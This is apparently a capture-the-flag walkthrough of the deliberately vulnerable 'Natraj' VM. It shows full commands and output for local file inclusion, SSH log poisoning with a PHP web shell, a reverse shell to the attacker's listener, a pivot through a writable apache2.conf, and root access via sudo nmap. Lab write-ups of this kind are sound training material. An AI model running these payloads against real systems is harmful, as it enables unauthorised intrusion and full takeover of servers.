Natraj
Port recognition withnmap
┌──(root@ghost)-[/home/ghost]
└─# nmap -v -p- --open --min-rate 5000 natraj.vuln -sV
Starting Nmap 7.92 ( https://nmap.org ) at 2022-12-21 11:20 EST
NSE: Loaded 45 scripts for scanning.
Initiating ARP Ping Scan at 11:20
Scanning natraj.vuln (10.0.2.53) [1 port]
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
MAC Address: 08:00:27:BF:A5:2E (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
nmap reports two open ports 22 ssh and 80 http
┌──(root@ghost)-[/home/ghost]
└─# wfuzz -t 100 -c -w /usr/share/dirb/wordlists/common.txt --hc=404 http://natraj.vuln/FUZZ
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://natraj.vuln/FUZZ
Total requests: 4614
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000011: 403 9 L 28 W 276 Ch ".hta"
000000001: 200 182 L 1767 W 14497 Ch "http://natraj.vuln/"
000001007: 301 9 L 28 W 312 Ch "console"
000001991: 301 9 L 28 W 311 Ch "images"
000002020: 200 182 L 1767 W 14497 Ch "index.html"
000000013: 403 9 L 28 W 276 Ch ".htpasswd"
000000012: 403 9 L 28 W 276 Ch ".htaccess"
000003588: 403 9 L 28 W 276 Ch "server-status"
Fuzzing some routes we found console, after visiting http://natraj.vuln/console/ we found file.php that is apparently empty
┌──(root@ghost)-[/home/ghost]
└─# wfuzz -t 100 -c -w /usr/share/dirb/wordlists/common.txt --hc=404 --hh=0 http://natraj.vuln/console/file.php?FUZZ=/etc/passwd
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://natraj.vuln/console/file.php?FUZZ=/etc/passwd
Total requests: 4614
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000001601: 200 27 L 35 W 1398 Ch "file"
Vulnerable parameter to LFI found
┌──(root@ghost)-[/home/ghost]
└─# curl -s http://natraj.vuln/console/file.php?file=/etc/passwd | grep 'sh$'
root:x:0:0:root:/root:/bin/bash
natraj:x:1000:1000:natraj,,,:/home/natraj:/bin/bash
mahakal:x:1001:1001:,,,:/home/mahakal:/bin/bash
┌──(root@ghost)-[/home/ghost]
└─# python3 lfienum "http://natraj.vuln/console/file.php?file="
...
> http://natraj.vuln/console/file.php?file=/var/log/auth.log
[Response Code]: 200
[Content Lenght]: 12388
[Content Lines]: 131
Jun 3 09:41:14 ubuntu systemd-logind[434]: New seat seat0.
Jun 3 09:41:14 ubuntu systemd-logind[434]: Watching system buttons on /dev/input/event0 (Power Button)
Jun 3 09:41:15 ubuntu sshd[457]: Server listening on 0.0.0.0 port 22.
Jun 3 09:41:15 ubuntu sshd[457]: Server listening on :: port 22.
Jun 3 09:41:15 ubuntu systemd-logind[434]: Watching system buttons on /dev/input/event1 (AT Translated Set 2 keyboard)
Jun 3 09:41:47 ubuntu sshd[612]: Accepted password for natraj from 192.168.1.103 port 49859 ssh2
Jun 3 09:41:47 ubuntu sshd[612]: pam_unix(sshd:session): session opened for user natraj by (uid=0)
Jun 3 09:41:47 ubuntu systemd-logind[434]: New session 1 of user natraj.
Jun 3 09:41:47 ubuntu systemd: pam_unix(systemd-user:session): session opened for user natraj by (uid=0)
Jun 3 09:41:59 ubuntu sudo: natraj : TTY=pts/0 ; PWD=/home/natraj ; USER=root ; COMMAND=/bin/bash
...
After enumerating with lfienum we found /var/log/auth.log, thinking about the web server and ssh service schema maybe we can do log poisoning
┌──(root@ghost)-[/home/ghost]
└─# python3 lfi2rce "http://natraj.vuln/console/file.php?file=" ssh 10.0.2.43 1337
lfi2rce - Local File Inclusion To Remote Code Execution v1.0 by 0bfxgh0st*
💀 Poison /var/log/auth.log
💀 Sending payload
<?php system($_GET["cmd"]); ?>@natraj.vuln's password:
Permission denied, please try again.
<?php system($_GET["cmd"]); ?>@natraj.vuln's password:
Permission denied, please try again.
<?php system($_GET["cmd"]); ?>@natraj.vuln's password:
<?php system($_GET["cmd"]); ?>@natraj.vuln: Permission denied (publickey,password).
listening on [any] 1337 ...
connect to [10.0.2.43] from natraj.vuln [10.0.2.53] 51474
bash: cannot set terminal process group (507): Inappropriate ioctl for device
bash: no job control in this shell
www-data@ubuntu:/var/www/html/console$
I made this RCE PoC for some log poison cases lfi2rce
www-data@ubuntu:/var/www/html/console$ find / -writable 2>/dev/null | grep -v 'proc\|lib\|dev\|run\|sys'
/tmp
/etc/apache2/apache2.conf
/var/www/html
/var/tmp
/var/lock
/var/cache/apache2/mod_cache_disk
www-data@ubuntu:/var/www/html/console$ ls -la /etc/apache2/apache2.conf
-rwxrwxrwx 1 root root 7224 Mar 13 2020 /etc/apache2/apache2.conf
After scratching all system looking and filtering for some file to scalate seems we found apache2.conf
www-data@ubuntu:/var/www/html/console$ nano /etc/apache2/apache2.conf
...
# These need to be set in /etc/apache2/envvars
User ${APACHE_RUN_USER}
Group ${APACHE_RUN_GROUP}
...
Change User and Group values from this variables
# These need to be set in /etc/apache2/envvars
User mahakal
Group mahakal
To this
NOTE: To pivot from www-data to mahakal you need to reboot Natraj virtual machine manually in order to apply changes in apache server. At this point we can place a php reverse shell in /var/www/html/ folder to get instant access before reboot, but I will use lfi2rce to reconect again
Rebooting Natraj vm manually...
┌──(root@ghost)-[/home/ghost]
└─# python3 lfi2rce "http://natraj.vuln/console/file.php?file=" ssh 10.0.2.43 1337
lfi2rce - Local File Inclusion To Remote Code Execution v1.0 by 0bfxgh0st*
💀 Poison /var/log/auth.log
💀 Sending payload
<?php system($_GET["cmd"]); ?>@natraj.vuln's password:
Permission denied, please try again.
<?php system($_GET["cmd"]); ?>@natraj.vuln's password:
Permission denied, please try again.
<?php system($_GET["cmd"]); ?>@natraj.vuln's password:
<?php system($_GET["cmd"]); ?>@natraj.vuln: Permission denied (publickey,password).
listening on [any] 1337 ...
connect to [10.0.2.43] from natraj.vuln [10.0.2.53] 51474
bash: cannot set terminal process group (507): Inappropriate ioctl for device
bash: no job control in this shell
mahakal@ubuntu:/var/www/html/console$ whoami
mahakal
mahakal@ubuntu:/var/www/html/console$
And we are mahakal user now
mahakal@ubuntu:/var/www/html/console$ sudo -l
Matching Defaults entries for mahakal on ubuntu:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User mahakal may run the following commands on ubuntu:
(root) NOPASSWD: /usr/bin/nmap
mahakal@ubuntu:/var/www/html/console$ /usr/bin/nmap --version
Nmap version 7.60 ( https://nmap.org )
We can run nmap as sudo user to escalate
┌──(root@ghost)-[/home/ghost]
└─# python3 gtfobins.py nmap
[Sudo]
If the binary is allowed to run as superuser by sudo, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain privileged access.
Input echo is disabled.
TF=$(mktemp)
echo 'os.execute("/bin/sh")' > $TF
sudo nmap --script=$TF
The interactive mode, available on versions 2.02 to 5.21, can be used to execute shell commands.
sudo nmap --interactive
nmap> !sh
We found some usefull payloads in https://gtfobins.github.io/gtfobins/nmap/#sudo
You can find gtfobins.py script in https://github.com/0bfxgh0st/gtfobins-webcrawler
mahakal@ubuntu:/var/www/html/console$ TF=$(mktemp)
mahakal@ubuntu:/var/www/html/console$ echo 'os.execute("/bin/sh")' > $TF
mahakal@ubuntu:/var/www/html/console$ sudo nmap --script=$TF
Starting Nmap 7.60 ( https://nmap.org ) at 2022-12-21 09:44 PST
NSE: Warning: Loading '/tmp/tmp.vnuCQ2MsJl' -- the recommended file extension is '.nse'.
whoami
root
cat /root/root.txt
███▄▄▄▄ ▄████████ ███ ▄████████ ▄████████ ▄█
███▀▀▀██▄ ███ ███ ▀█████████▄ ███ ███ ███ ███ ███
███ ███ ███ ███ ▀███▀▀██ ███ ███ ███ ███ ███
███ ███ ███ ███ ███ ▀ ▄███▄▄▄▄██▀ ███ ███ ███
███ ███ ▀███████████ ███ ▀▀███▀▀▀▀▀ ▀███████████ ███
███ ███ ███ ███ ███ ▀███████████ ███ ███ ███
███ ███ ███ ███ ███ ███ ███ ███ ███ ███
▀█ █▀ ███ █▀ ▄████▀ ███ ███ ███ █▀ █▄ ▄███
███ ███ ▀▀▀▀▀▀
!! Congrats you have finished this task !!
Contact us here:
Hacking Articles : https://twitter.com/rajchandel/
Geet Madan : https://www.linkedin.com/in/geet-madan/
+-+-+-+-+-+ +-+-+-+-+-+-+-+
|E|n|j|o|y| |H|A|C|K|I|N|G|
+-+-+-+-+-+ +-+-+-+-+-+-+-+
__________________________________